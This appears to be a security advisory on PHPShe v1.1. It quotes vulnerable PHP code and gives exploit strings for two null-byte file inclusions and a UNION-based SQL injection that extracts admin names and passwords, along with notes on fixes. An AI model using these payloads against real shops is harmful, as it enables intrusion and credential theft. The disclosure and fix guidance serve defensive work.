/*******************************************************
 * Phpshe v1.1 Vulnerability
 * E-Mail: 681796@qq.com
 *******************************************************/

0x00 Overview: how request parameters are passed

```php
// common.php
if (get_magic_quotes_gpc()) {
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');
```

Every GET, POST, SESSION and COOKIE value becomes a local variable named $_g_*, $_p_*, $_s_* or $_c_*. No escaping or validation is visible at this stage, so every $_g_*, $_p_* and $_c_* variable used in the sections below is untrusted input.

0x01 File inclusion vulnerability

```php
// home page file
// (the beginning of the next statement is cut off in the original post)
... pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php"); // $mod is controllable: a "chicken rib" (limited-value) include vulnerability
pe_result();
?>

// starting from line 8 of the common file
// url routing configuration
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['ac'] ? $_POST['ac'] : ($_GET['ac'] ? $_GET['ac'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);

// exp: http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
```

Note: the include is "chicken rib" because ".php" is appended to $mod, so reaching any other file depends on the %00 truncation, which PHP 5.3.4 and later reject. The fix is to compare $mod (and $act) against a fixed list of module names before the include. The first line of the excerpt also passes the cookie value $_c_cart_list to unserialize(), which should not be called on client-supplied data.

0x02 Search SQL injection

```php
// product.php file
case 'list':
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // search
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        $sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; // $_g_keyword goes into the SQL statement without any filtering
    if ($_g_orderby) {
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // ranking
    $product_hotlist = product_hotlist();
    // current path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));

// following pe_selectall into the database library
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // process the condition statement
    $sqlwhere = $this->_dowhere($where);
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}

// exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
```

Note: the where clause is built as a string and handed to pe_selectall(), which concatenates it into the query; _dowhere() is not shown, but nothing in the excerpt escapes the keyword. $_g_orderby is interpolated into the ORDER BY clause in the same way. The fix is to bind the keyword as a query parameter (or escape it for the database driver) and to accept only known column names and asc/desc for the ordering.

0x03 File inclusion vulnerability 2

```php
// order.php
case 'pay':
    $order_id = pe_dbhold($_g_id);
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('order number error...');
    if (isset($_p_pesubmit)) {
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo 'the payment website is being connected for you. Please wait...';
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        } // once everything above succeeds, the "chicken rib" include is reached
        else {
            pe_error('payment error...');
        }
    }
    $seo = pe_seo('select payment method');
    include(pe_tpl('order_pay.html'));
break;
}

// exp:
// http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001
// info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98
```

Note: $_p_info['order_payway'] comes straight from the POST body and is used as a directory name in the include path; as in 0x01, the fixed "/order_pay.php" suffix means the include depends on %00 truncation. The fix is to accept only payway names that exist as keys of $cache_payway before building the path. The whole $_p_info array is also passed to pe_update(), so the client chooses which order columns are written; only the expected fields should be copied into the update.